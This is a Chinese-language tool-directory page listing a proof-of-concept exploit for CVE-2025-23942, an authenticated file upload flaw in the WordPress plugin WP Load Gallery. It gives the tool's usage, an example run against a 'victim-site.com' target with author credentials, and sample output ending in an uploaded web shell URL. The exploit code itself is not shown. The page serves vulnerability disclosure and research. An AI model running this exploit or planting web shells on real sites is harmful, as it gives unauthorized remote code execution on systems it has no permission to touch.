Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - 认证用户(作者+)任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-23942-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - 认证用户(作者+)任意文件上传

查看仓库
321年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WP Load Gallery 漏洞利用 (CVE-2025-23942)

📌 描述

NgocCode WP Load Gallery 中存在危险类型文件无限制上传漏洞,允许向 Web 服务器上传 Web Shell。该漏洞影响 WP Load Gallery 版本:从 n/a 至 2.1.6。

⚠️ 漏洞详情

  • CVE ID: CVE-2025-23942
  • 受影响插件: WP Load Gallery
  • 受影响版本: 最高 2.1.6
  • 漏洞类型: 无限制文件上传
  • 严重性: 严重 (CVSS 9.1)
  • 攻击向量: 已验证用户 (作者级+) 远程代码执行 (RCE)
  • 补丁可用性: ❌ (尚无官方补丁)

🚀 漏洞利用功能

✅ 自动化利用 – 自动提取 nonce、登录并上传 Web Shell。
✅ 版本检查 – 利用前确认目标是否存在漏洞。
✅ 错误处理 – 即使在失败情况下也能确保平稳执行。
✅ 会话管理 – 使用持久化会话管理进行身份验证。
✅ 实时反馈 – 在每个步骤提供输出。

🛠️ 要求

  • Python 3.x
  • requests 模块 (pip install requests)
  • 目标系统上有效的 WordPress 作者级及以上账户

🔥 使用方法

使用必要参数运行脚本:

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

利用 WP Load Gallery - 任意文件上传

options:
  -h, --help            显示此帮助信息并退出
  -u URL, --url URL     目标 WordPress URL (例如 https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress 用户名
  -p PASSWORD, --password PASSWORD
                        WordPress 密码

示例:

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 输出示例

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] 正在检查插件版本...
[+] 检测到版本:2.1.6
[+] 目标存在漏洞!正在继续利用...
[+] 登录成功。
[+] 正在提取 wplg_nonce...
[+] 提取 wplg_nonce:a1b2c3d4e5
[+] 正在上传 Shell...
[+] 文件上传成功!
[+] Shell 访问地址:http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 法律免责声明

此漏洞利用工具仅用于教育和安全研究目的。请勿在您没有所有权或未经明确许可的系统上使用。作者对任何滥用此脚本的行为不承担责任。 ( Khaled_alenazi )

下载工具